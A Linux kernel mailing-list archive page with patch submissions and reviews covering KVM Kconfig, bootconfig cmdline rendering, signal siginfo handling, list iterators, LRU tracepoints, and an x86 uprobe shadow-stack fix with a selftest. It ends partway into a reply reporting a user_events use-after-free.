Linux Trace Kernel

Linux Trace Kernel
 help / color / mirror / Atom feed

* Re: [PATCH v8 05/46] KVM: Make CONFIG_KVM_VM_MEMORY_ATTRIBUTES selectable
From: Sean Christopherson @ 2026-06-23  0:16 UTC (permalink / raw)
  To: Julian Braha
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	tabba, willy, wyihan, yan.y.zhao, forkloop, pratyush,
	suzuki.poulose, aneesh.kumar, liam, Paolo Bonzini,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, Jonathan Corbet, Shuah Khan, Shuah Khan,
	Vishal Annapurve, Andrew Morton, Chris Li, Kairui Song,
	Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen, Yuanchu Xie,
	Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt, Kiryl Shutsemau,
	Baoquan He, Jason Gunthorpe, Vlastimil Babka, kvm, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest, linux-mm,
	linux-coco
In-Reply-To: <8e53844c-f2f8-4a4b-bf72-f3140c170d43@gmail.com>

On Fri, Jun 19, 2026, Julian Braha wrote:
> Hi Ackerley,
> 
> On 6/19/26 01:31, Ackerley Tng via B4 Relay wrote:
> 
> >  config KVM_VM_MEMORY_ATTRIBUTES
> > -	bool
> > +	depends on KVM_SW_PROTECTED_VM || KVM_INTEL_TDX || KVM_AMD_SEV
> > +	bool "Enable per-VM PRIVATE vs. SHARED attributes (for CoCo VMs)"
> 
> Sorry for the style nitpick, but could you keep the type and prompt as
> the first attribute in the Kconfig option definition (like the other
> options do)?

No need to be sorry, I've no idea why I put the "depends" first.  I don't even
know if that qualifies as a nit :-)

Ackerley, if you can provide your SoB (for Fuad's feedback), I can fixup when
applying (assuming nothing else necessitates v9).

^ permalink raw reply

* Re: [PATCH v4 6/7] Documentation: bootconfig: document build-time cmdline rendering
From: Masami Hiramatsu @ 2026-06-23  0:11 UTC (permalink / raw)
  To: Breno Leitao
  Cc: Andrew Morton, Nathan Chancellor, paulmck, Nicolas Schier,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, linux-kernel, linux-trace-kernel, linux-kbuild,
	bpf, kernel-team
In-Reply-To: <ajkfTQwmmVo0DvFx@gmail.com>

Hi Breno,

On Mon, 22 Jun 2026 05:30:53 -0700
Breno Leitao <leitao@debian.org> wrote:

> On Thu, Jun 18, 2026 at 09:47:19AM +0900, Masami Hiramatsu wrote:
> > On Wed, 17 Jun 2026 02:56:23 -0700
> > Breno Leitao <leitao@debian.org> wrote:
> > 
> > > On Wed, Jun 10, 2026 at 07:58:10AM -0700, Breno Leitao wrote:
> > > > On Wed, Jun 10, 2026 at 11:37:20PM +0900, Masami Hiramatsu wrote:
> > > > > To avoid confusion, when this option is used, shouldn't we treat it
> > > > > the same way as if embedded command lines were enabled, and either
> > > > > not display it in /proc/bootconfig (or always display it, by merging
> > > > > the rendered string)?
> > > > 
> > > > You're right that EMBED_CMDLINE breaks it: the embedded kernel.* keys
> > > > are already in boot_command_line before setup_boot_config() ever sees
> > > > the initrd bconf, so a user reading /proc/bootconfig would see only
> > > > the initrd keys while parse_early_param() acted on the embedded ones.
> > > > That's exactly the split-state Sashiko was circling around.
> > > > 
> > > > Both options you suggest work for me, but they pull in opposite
> > > > directions and I'd rather not guess wrong on the user-facing
> > > > contract.  Which do you prefer for v5?
> > > > 
> > > >   (a) Don't display embedded in /proc/bootconfig -- keep the current
> > > >       "file shows the active bootconfig source" behavior and document
> > > >       that with EMBED_CMDLINE=y, the kernel.* subtree may have been
> > > >       applied separately via the cmdline.
> > > > 
> > > >   (b) Always display embedded by merging the rendered string into
> > > >       /proc/bootconfig when EMBED_CMDLINE=y, so the file reflects
> > > >       what was actually applied.
> > > > 
> > > > Happy to go either way
> > > 
> > > Following up on my own mail rather than leaving it fully open: after
> > > looking at the code more, I'd like to recommend (a).
> > 
> > Agreed. Sorry for replying late.
> 
> No problem, thanks. Quick heads-up: v5 already went out and crossed with
> this mail. It takes (a) and extends bootconfig.rst to walk through the
> four sources (bootloader cmdline, embedded cmdline, initrd bootconfig,
> embedded bootconfig), so that part is already in flight:
> 
>   https://lore.kernel.org/r/20260617-bootconfig_using_tools-v5-0-fd589a9cc5e3@debian.org
> 
> The naming/mutual-exclusion rework below I'll fold into v6.

Yeah, thanks for updating!

> 
> > Indeed. So I think this EMBED_CMDLINE is more like CMDLINE set by
> > bootconfig file, instead of embedded string. That is useful for reusing
> > the boot options. We need to change the explanation and clarify it.
> 
> Agreed, that's a much clearer model. v6 will reframe the Kconfig help and
> bootconfig.rst around "this is CONFIG_CMDLINE, sourced from a bootconfig
> file at build time" rather than "an embedded bootconfig that also feeds
> the cmdline".

Nice!

> 
> It also matches what the code already does precedence-wise: the rendered
> "kernel" string is prepended to boot_command_line in setup_arch(), so it
> sits in front of the bootloader args and parse_args() last-wins lets the
> bootloader override it -- i.e. exactly CONFIG_CMDLINE without _OVERRIDE.
> So this is mostly a rename + dependency + docs change, not a behavioral
> one. (A _FORCE/_EXTEND-style variant could come later if there's demand;
> the current behavior is the plain "overridable default" one.)

OK. Yeah, for the first step, I think current behavior is enough.

> 
> > Thus we should those configs mutual exclusive. If user already sets the
> > CONFIG_CMDLINE, EMBED_CMDLINE should not be enabled.
> 
> Makes sense -- two built-in cmdline sources at once is confusing. I'll
> make them mutually exclusive in v6. I'm thinking:
> 
>   depends on CMDLINE = ""
> 
> on the new symbol. On x86 CONFIG_CMDLINE is a string that depends on
> CMDLINE_BOOL and defaults to "", so this reads as "only offer the
> bootconfig-rendered cmdline when no static CONFIG_CMDLINE is configured",
> and it works the same on other arches that define CMDLINE as a string.
> Does that match what you had in mind, or would you rather gate it the
> other way (CMDLINE depends on !the-new-symbol)?

No, this looks good and enough clear to me.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it maybe natual that we call it CONFIG_CMDLINE_BOOT_CONFIG.
> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it maybe natual that we call it CONFIG_CMDLINE_BOOT_CONFIG.
> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG I'll rename it
> for v6.

Yeah, thanks!

> 
> Another nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG unless you'd
> rather keep CONFIG_CMDLINE_BOOT_CONFIG -- either is fine by me.

I think it should use the same pattern to avoid confusion.

> 
> One clarification on "set CONFIG_CMDLINE with the rendered string":
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE. The mechanism stays "render into
> .init.rodata, merge into boot_command_line in setup_arch()"; what changes
> is how we name and document it, plus the mutual exclusion above. Let me

Yes, it is fine to me because it does not change the current behavior.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it maybe natual that we call it CONFIG_CMDLINE_BOOT_CONFIG.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG
> would pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG

Yes, that's better to be renamed.

> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE?  let me know if you can envision a way to
> get it done.

Ah, ok. Nevermind, as far as it is shown in /proc/cmdline, I think it is OK.
(BTW, if we use the embedded bootconfig, the file path is shown in
 /proc/config.gz, maybe I need to notice it.)

> > I think we can proceed it without rendering it in /proc/bootconfig
> > at this point. And later we find the way to detect early parameters
> > correctly, we can fix it.
> 
> Sounds good. I'll document the sharp edge (with both an embedded cmdline and an
> initrd bootconfig, early params reflect the embedded values because the initrd
> isn't parsed yet) and leave the early-param-aware override detection as the
> follow-up you describe.

Thanks for the documenting :)

> 
> > (BTW, early parameter problem is a bit complicated. It is not hard
> > to distinguish early parameters, but kernel accepts the same key
> > for early parameter and normal parameter. e.g. "console=")
> 
> Right, console= being both is the awkward case. Agreed that's better as
> its own series once we have a reliable way to detect early params.
> 
> So the v6 plan:
>   - rename CONFIG_BOOT_CONFIG_EMBED_CMDLINE -> CONFIG_CMDLINE_FROM_BOOTCONFIG
>     (or _BOOT_CONFIG, your call)
>   - make it mutually exclusive with CONFIG_CMDLINE (depends on CMDLINE = "")
>   - reframe the Kconfig help + bootconfig.rst as "CONFIG_CMDLINE from a
>     bootconfig file"
>   - keep (a): no rendering in /proc/bootconfig; document the early-param
>     sharp edge
>   - defer early-param-aware override detection to a follow-up
> 
> Thanks for the direction,

Thanks for working on this feature!

Thank you,

> --breno
> 


-- 
Masami Hiramatsu (Google) <mhiramat@kernel.org>

^ permalink raw reply

* [PATCH v2 2/2] signal: make send_signal_locked() take const siginfo
From: Bradley Morgan @ 2026-06-22 20:25 UTC (permalink / raw)
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() should not change the caller's siginfo. Make that
part of the type and keep the local rewrite on its copy.

Suggested-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- New patch from Oleg's suggestion.
- Link to Oleg's suggestion:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m5f8a2d54928efff41de539969b68149e1ec5fca4

 include/linux/signal.h        |  2 +-
 include/trace/events/signal.h |  4 ++--
 kernel/signal.c               | 20 +++++++++++---------
 3 files changed, 14 insertions(+), 12 deletions(-)

diff --git a/include/linux/signal.h b/include/linux/signal.h
index f19816832f05..a1ba8c5973c6 100644
--- a/include/linux/signal.h
+++ b/include/linux/signal.h
@@ -283,7 +283,7 @@ extern int do_send_sig_info(int sig, struct kernel_siginfo *info,
 				struct task_struct *p, enum pid_type type);
 extern int group_send_sig_info(int sig, struct kernel_siginfo *info,
 			       struct task_struct *p, enum pid_type type);
-extern int send_signal_locked(int sig, struct kernel_siginfo *info,
+extern int send_signal_locked(int sig, const struct kernel_siginfo *info,
 			      struct task_struct *p, enum pid_type type);
 extern int sigprocmask(int, sigset_t *, sigset_t *);
 extern void set_current_blocked(sigset_t *);
diff --git a/include/trace/events/signal.h b/include/trace/events/signal.h
index 1db7e4b07c01..05a46135ee34 100644
--- a/include/trace/events/signal.h
+++ b/include/trace/events/signal.h
@@ -49,8 +49,8 @@ enum {
  */
 TRACE_EVENT(signal_generate,
 
-	TP_PROTO(int sig, struct kernel_siginfo *info, struct task_struct *task,
-			int group, int result),
+	TP_PROTO(int sig, const struct kernel_siginfo *info,
+		 struct task_struct *task, int group, int result),
 
 	TP_ARGS(sig, info, task, group, result),
 
diff --git a/kernel/signal.c b/kernel/signal.c
index d72d9be3a992..26e8b8e1d03c 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1037,7 +1037,7 @@ static inline bool legacy_queue(struct sigpending *signals, int sig)
 	return (sig < SIGRTMIN) && sigismember(&signals->signal, sig);
 }
 
-static int __send_signal_locked(int sig, struct kernel_siginfo *info,
+static int __send_signal_locked(int sig, const struct kernel_siginfo *info,
 				struct task_struct *t, enum pid_type type, bool force)
 {
 	struct sigpending *pending;
@@ -1154,7 +1154,7 @@ static int __send_signal_locked(int sig, struct kernel_siginfo *info,
 	return ret;
 }
 
-static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
+static inline bool has_si_pid_and_uid(const struct kernel_siginfo *info)
 {
 	bool ret = false;
 	switch (siginfo_layout(info->si_signo, info->si_code)) {
@@ -1178,10 +1178,11 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 	return ret;
 }
 
-int send_signal_locked(int sig, struct kernel_siginfo *info,
+int send_signal_locked(int sig, const struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
 	struct kernel_siginfo rewritten;
+	const struct kernel_siginfo *send_info = info;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1196,26 +1197,27 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		struct user_namespace *t_user_ns;
 
 		rewritten = *info;
-		info = &rewritten;
+		send_info = &rewritten;
 
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-			kuid_t uid = make_kuid(current_user_ns(), info->si_uid);
-			info->si_uid = from_kuid_munged(t_user_ns, uid);
+			kuid_t uid = make_kuid(current_user_ns(), rewritten.si_uid);
+
+			rewritten.si_uid = from_kuid_munged(t_user_ns, uid);
 		}
 		rcu_read_unlock();
 
 		/* A kernel generated signal? */
-		force = (info->si_code == SI_KERNEL);
+		force = (rewritten.si_code == SI_KERNEL);
 
 		/* From an ancestor pid namespace? */
 		if (!task_pid_nr_ns(current, task_active_pid_ns(t))) {
-			info->si_pid = 0;
+			rewritten.si_pid = 0;
 			force = true;
 		}
 	}
-	return __send_signal_locked(sig, info, t, type, force);
+	return __send_signal_locked(sig, send_info, t, type, force);
 }
 
 static void print_fatal_signal(int signr)
-- 
2.53.0

^ permalink raw reply related

* [PATCH v2 1/2] signal: avoid shared siginfo namespace rewrites
From: Bradley Morgan @ 2026-06-22 20:25 UTC (permalink / raw)
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan, stable
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() rewrites sender ids for the target namespace.
Group sends reuse the same siginfo, so one recipient can affect the
next.

Copy the siginfo before changing it.

Fixes: 7a0cf094944e ("signal: Correct namespace fixups of si_pid and si_uid")
Cc: stable@vger.kernel.org
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- No code changes in this patch.
- Add patch 2 for Oleg's const suggestion.
- Link to v1:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m89955d13f10807c316d34cc76680d690a2d95b31

 kernel/signal.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/kernel/signal.c b/kernel/signal.c
index b9fc7be1a169..d72d9be3a992 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1181,6 +1181,7 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 int send_signal_locked(int sig, struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
+	struct kernel_siginfo rewritten;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1194,6 +1195,9 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		/* SIGKILL and SIGSTOP is special or has ids */
 		struct user_namespace *t_user_ns;
 
+		rewritten = *info;
+		info = &rewritten;
+
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-- 
2.53.0

^ permalink raw reply related

* Re: [PATCH v3 5/7] kernel: Use mutable list iterators
From: Eduard Zingerman @ 2026-06-22 19:03 UTC (permalink / raw)
  To: Kaitao Cheng, Paul Moore, Eric Paris, Alexei Starovoitov,
	Daniel Borkmann, Andrii Nakryiko, Kumar Kartikeya Dwivedi,
	David S. Miller, Jakub Kicinski, Jesper Dangaard Brouer,
	John Fastabend, Tejun Heo, Johannes Weiner, Michal Koutný,
	Maarten Lankhorst, Maxime Ripard, Natalie Vock, Peter Zijlstra,
	Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Masami Hiramatsu, Oleg Nesterov, Peter Oberparleiter,
	Andrew Morton, Baoquan He, Mike Rapoport, Pasha Tatashin,
	Pratyush Yadav, Naveen N Rao, Josh Poimboeuf, Jiri Kosina,
	Miroslav Benes, Petr Mladek, Will Deacon, Boqun Feng,
	Luis Chamberlain, Petr Pavlu, Daniel Gomez, Sami Tolvanen,
	Steffen Klassert, Daniel Jordan, Rafael J. Wysocki,
	Davidlohr Bueso, Paul E. McKenney, Josh Triplett,
	Frederic Weisbecker, Neeraj Upadhyay, Joel Fernandes,
	Uladzislau Rezki, Juri Lelli, Vincent Guittot, Kees Cook,
	Balbir Singh, Anna-Maria Behnsen, Thomas Gleixner, John Stultz,
	KP Singh, Matt Bobrowski, Nathan Chancellor, Martin KaFai Lau,
	Song Liu, Mark Rutland, Mathieu Desnoyers, Dietmar Eggemann,
	David Vernet, Steven Rostedt
  Cc: audit, linux-kernel, bpf, netdev, cgroups, dri-devel,
	linux-perf-users, linux-trace-kernel, kexec, live-patching,
	linux-modules, linux-crypto, linux-pm, rcu, sched-ext, llvm,
	Kaitao Cheng
In-Reply-To: <20260622042811.31684-1-kaitao.cheng@linux.dev>

On Mon, 2026-06-22 at 12:28 +0800, Kaitao Cheng wrote:
> From: Kaitao Cheng <chengkaitao@kylinos.cn>
> 
> The safe list iteration helpers require callers to provide a temporary
> cursor even when the cursor is only used internally by the loop. This
> leaves many functions with otherwise unused variables whose only purpose
> is to satisfy the old iterator interface.
> 
> Use the mutable list iteration helpers for those cases. The mutable
> helpers keep the same removal-safe traversal semantics, while allowing
> the temporary cursor to be internal to the macro when the caller does
> not need to observe it.
> 
> Convert list, hlist and llist users under kernel/ where the temporary
> cursor is not used outside the iteration. Keep the explicit cursor form
> where the next entry is still needed by the surrounding code.
> 
> No functional change intended.
> 
> Signed-off-by: Kaitao Cheng <chengkaitao@kylinos.cn>
> ---

Beside the fact that this does not apply,
I don't see a reason why is this needed for BPF sub-tree.

[...]

^ permalink raw reply

* [PATCH v5] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 18:51 UTC (permalink / raw)
  To: linux-mm, willy, shakeel.butt, usama.arif, akpm, vbabka, mhocko,
	rostedt, mhiramat, mathieu.desnoyers, kasong, qi.zheng, baohua,
	axelrasmussen, yuanchu, weixugc, chrisl, shikemeng, nphamcs,
	baoquan.he, youngjun.park
  Cc: linux-kernel, linux-trace-kernel

LRU add batches can be drained before they reach capacity. This can be a
source of LRU lock contention, but it is not currently possible to
attribute these drains to callers with existing tracepoints.

Add mm_lru_add_drain to report the CPU and lru_add batch count when an
lru_add batch is drained. This allows tracing to distinguish full drains
from partial drains and attribute them to the calling stack.

Add mm_lru_add_drain_all to capture callers of __lru_add_drain_all and
whether they set the force flag for all CPUs. The tracepoint resembles
the signature of the enclosing function, but is needed because of
potential inlining.

Note that DECLARE_TRACE() is used for these new trace hooks to avoid
creating a new trace event ABI.

Signed-off-by: JP Kobryn <jp.kobryn@linux.dev>
Reviewed-by: Barry Song <baohua@kernel.org>
Acked-by: Shakeel Butt <shakeel.butt@linux.dev>
---
v5:
  - change from trace events to bare trace hooks

v4: https://lore.kernel.org/linux-mm/20260610234808.212397-1-jp.kobryn@linux.dev/
  - renamed nr_folio_add to nr_folios in lru_add_drain()
  - renamed nr to nr_folios in tracepoint for consistency

v3: https://lore.kernel.org/linux-mm/20260610195220.12403-1-jp.kobryn@linux.dev/
  - restored and renamed tracepoint in __lru_add_drain_all

v2: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/
  - removed mm_lru_drain_all tracepoint

v1: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/

 include/trace/events/pagemap.h | 8 ++++++++
 mm/swap.c                      | 7 ++++++-
 2 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/include/trace/events/pagemap.h b/include/trace/events/pagemap.h
index 171524d3526d..36c3a90f0acc 100644
--- a/include/trace/events/pagemap.h
+++ b/include/trace/events/pagemap.h
@@ -77,6 +77,14 @@ TRACE_EVENT(mm_lru_activate,
 	TP_printk("folio=%p pfn=0x%lx", __entry->folio, __entry->pfn)
 );
 
+DECLARE_TRACE(mm_lru_add_drain,
+	      TP_PROTO(int cpu, unsigned int nr_folios),
+	      TP_ARGS(cpu, nr_folios));
+
+DECLARE_TRACE(mm_lru_add_drain_all,
+	      TP_PROTO(bool force_all_cpus),
+	      TP_ARGS(force_all_cpus));
+
 #endif /* _TRACE_PAGEMAP_H */
 
 /* This part must be outside protection */
diff --git a/mm/swap.c b/mm/swap.c
index 588f50d8f1a8..460e56370b3c 100644
--- a/mm/swap.c
+++ b/mm/swap.c
@@ -694,9 +694,12 @@ void lru_add_drain_cpu(int cpu)
 {
 	struct cpu_fbatches *fbatches = &per_cpu(cpu_fbatches, cpu);
 	struct folio_batch *fbatch = &fbatches->lru_add;
+	unsigned int nr_folios = folio_batch_count(fbatch);
 
-	if (folio_batch_count(fbatch))
+	if (nr_folios) {
 		folio_batch_move_lru(fbatch, lru_add);
+		trace_mm_lru_add_drain_tp(cpu, nr_folios);
+	}
 
 	fbatch = &fbatches->lru_move_tail;
 	/* Disabling interrupts below acts as a compiler barrier. */
@@ -869,6 +872,8 @@ static inline void __lru_add_drain_all(bool force_all_cpus)
 	if (WARN_ON(!mm_percpu_wq))
 		return;
 
+	trace_mm_lru_add_drain_all_tp(force_all_cpus);
+
 	/*
 	 * Guarantee folio_batch counter stores visible by this CPU
 	 * are visible to other CPUs before loading the current drain
-- 
2.54.0


^ permalink raw reply related

* [PATCH 2/2] selftests/x86: Add shadow stack uprobe CALL test
From: David Windsor @ 2026-06-22 18:31 UTC (permalink / raw)
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor
In-Reply-To: <20260622183109.1137245-1-dwindsor@gmail.com>

Add coverage for entry uprobes installed on CALL instructions while user
shadow stack is enabled. The test puts an entry uprobe on a helper whose
first instruction is a relative CALL, then verifies that the call/return
sequence completes without SIGSEGV.

This catches regressions where x86 uprobe CALL emulation updates the
regular user stack but leaves the CET shadow stack stale.

Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 tools/testing/selftests/x86/test_shadow_stack.c | 86 +++++++++++++++++++++++++
 1 file changed, 86 insertions(+)

diff --git a/tools/testing/selftests/x86/test_shadow_stack.c b/tools/testing/selftests/x86/test_shadow_stack.c
index 21af54d5f4ea..3d6ca33edba4 100644
--- a/tools/testing/selftests/x86/test_shadow_stack.c
+++ b/tools/testing/selftests/x86/test_shadow_stack.c
@@ -873,6 +873,86 @@ static int test_uretprobe(void)
 	return err;
 }
 
+/* Keep the CALL first so the function address is exactly the probed CALL. */
+extern void uprobe_call_trigger(void);
+asm (".pushsection .text\n"
+	".global uprobe_call_target\n"
+	".type uprobe_call_target, @function\n"
+	"uprobe_call_target:\n"
+	"	ret\n"
+	".size uprobe_call_target, .-uprobe_call_target\n"
+
+	".global uprobe_call_trigger\n"
+	".type uprobe_call_trigger, @function\n"
+	"uprobe_call_trigger:\n"
+	"	call uprobe_call_target\n"
+	"	ret\n"
+	".size uprobe_call_trigger, .-uprobe_call_trigger\n"
+	".popsection\n"
+);
+
+/* If CALL emulation misses the shadow stack update, this exits via SIGSEGV. */
+static int test_uprobe_call(void)
+{
+	const size_t attr_sz = sizeof(struct perf_event_attr);
+	const char *file = "/proc/self/exe";
+	int fd = -1, type, err = 1;
+	struct perf_event_attr attr;
+	struct sigaction sa = {};
+	ssize_t offset;
+
+	type = determine_uprobe_perf_type();
+	if (type < 0) {
+		if (type == -ENOENT)
+			printf("[SKIP]\tUprobe on CALL test, uprobes are not available\n");
+		return 0;
+	}
+
+	offset = get_uprobe_offset(uprobe_call_trigger);
+	if (offset < 0)
+		return 1;
+
+	sa.sa_sigaction = segv_gp_handler;
+	sa.sa_flags = SA_SIGINFO;
+	if (sigaction(SIGSEGV, &sa, NULL))
+		return 1;
+
+	/* Setup entry uprobe through perf event interface. */
+	memset(&attr, 0, attr_sz);
+	attr.size = attr_sz;
+	attr.type = type;
+	attr.config = 0;
+	attr.config1 = (__u64)(unsigned long)file;
+	attr.config2 = offset;
+
+	fd = syscall(__NR_perf_event_open, &attr, 0 /* pid */, -1 /* cpu */,
+		     -1 /* group_fd */, PERF_FLAG_FD_CLOEXEC);
+	if (fd < 0)
+		goto out;
+
+	if (sigsetjmp(jmp_buffer, 1))
+		goto out;
+
+	if (ARCH_PRCTL(ARCH_SHSTK_ENABLE, ARCH_SHSTK_SHSTK))
+		goto out;
+
+	/*
+	 * This either segfaults and goes through sigsetjmp above
+	 * or succeeds and we're good.
+	 */
+	uprobe_call_trigger();
+
+	printf("[OK]\tUprobe on CALL test\n");
+	err = 0;
+
+out:
+	ARCH_PRCTL(ARCH_SHSTK_DISABLE, ARCH_SHSTK_SHSTK);
+	signal(SIGSEGV, SIG_DFL);
+	if (fd >= 0)
+		close(fd);
+	return err;
+}
+
 void segv_handler_ptrace(int signum, siginfo_t *si, void *uc)
 {
 	/* The SSP adjustment caused a segfault. */
@@ -1071,6 +1151,12 @@ int main(int argc, char *argv[])
 		goto out;
 	}
 
+	if (test_uprobe_call()) {
+		ret = 1;
+		printf("[FAIL]\tuprobe on CALL test\n");
+		goto out;
+	}
+
 	return ret;
 
 out:
-- 
2.43.0

^ permalink raw reply related

* [PATCH 1/2] x86/uprobes: Keep shadow stack in sync for emulated CALLs
From: David Windsor @ 2026-06-22 18:31 UTC (permalink / raw)
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor

Uprobe CALL emulation updates the normal user stack, but not the CET user
shadow stack. The subsequent RET then sees a stale shadow stack entry and
raises #CP.

Update the relative CALL emulation and XOL CALL fixup paths to keep the
shadow stack in sync.

Fixes: 488af8ea7131 ("x86/shstk: Wire in shadow stack interface")
Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 arch/x86/kernel/uprobes.c | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/arch/x86/kernel/uprobes.c b/arch/x86/kernel/uprobes.c
index ebb1baf1eb1d..ae32013a7097 100644
--- a/arch/x86/kernel/uprobes.c
+++ b/arch/x86/kernel/uprobes.c
@@ -1246,8 +1246,12 @@ static int default_post_xol_op(struct arch_uprobe *auprobe, struct pt_regs *regs
 		long correction = utask->vaddr - utask->xol_vaddr;
 		regs->ip += correction;
 	} else if (auprobe->defparam.fixups & UPROBE_FIX_CALL) {
+		unsigned long retaddr = utask->vaddr + auprobe->defparam.ilen;
+
 		regs->sp += sizeof_long(regs); /* Pop incorrect return address */
-		if (emulate_push_stack(regs, utask->vaddr + auprobe->defparam.ilen))
+		if (emulate_push_stack(regs, retaddr))
+			return -ERESTART;
+		if (shstk_update_last_frame(retaddr))
 			return -ERESTART;
 	}
 	/* popf; tell the caller to not touch TF */
@@ -1338,6 +1342,10 @@ static bool branch_emulate_op(struct arch_uprobe *auprobe, struct pt_regs *regs)
 		 */
 		if (emulate_push_stack(regs, new_ip))
 			return false;
+		if (shstk_push(new_ip) == -EFAULT) {
+			regs->sp += sizeof_long(regs);
+			return false;
+		}
 	} else if (!check_jmp_cond(auprobe, regs)) {
 		offs = 0;
 	}
-- 
2.43.0

^ permalink raw reply related

* Re: [PATCH] tracing/user_events: fix use-after-free of enabler in user_event_mm_dup()
From: XIAO WU @ 2026-06-22 17:03 UTC (permalink / raw)
  To: Michael Bommarito, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers
  Cc: Beau Belgrave, linux-trace-kernel, linux-kernel, stable
In-Reply-To: <20260618222743.538915-1-michael.bommarito@gmail.com>

Hi,

I came across the Sashiko AI review [1] in this thread and wanted to
share some test results that may be useful.

First — thank you for this patch!  The enabler UAF in
user_event_mm_dup() is a real bug and the fix (kfree → kfree_rcu) is
the right approach for protecting the RCU list walkers.  The selftest
results you included in the commit are also really helpful.

However, I was able to reproduce a second UAF on the *user_event*
object that the Sashiko review flagged — it's still reachable after the
patch is applied.  I've included a PoC and crash log below.

On Thu, Jun 18, 2026 at 06:27:43PM -0400, Michael Bommarito wrote:
 > @@ -404,7 +407,12 @@ static void user_event_enabler_destroy(struct 
user_event_enabler *enabler,
 >      /* No longer tracking the event via the enabler */
 >      user_event_put(enabler->event, locked);
 >
 > -    kfree(enabler);
 > +    /*
 > +     * The enabler is removed from an RCU-traversed list
 > +     * (user_event_mm_dup walks mm->enablers under rcu_read_lock only),
 > +     * so the backing memory must outlive a grace period.
 > +     */
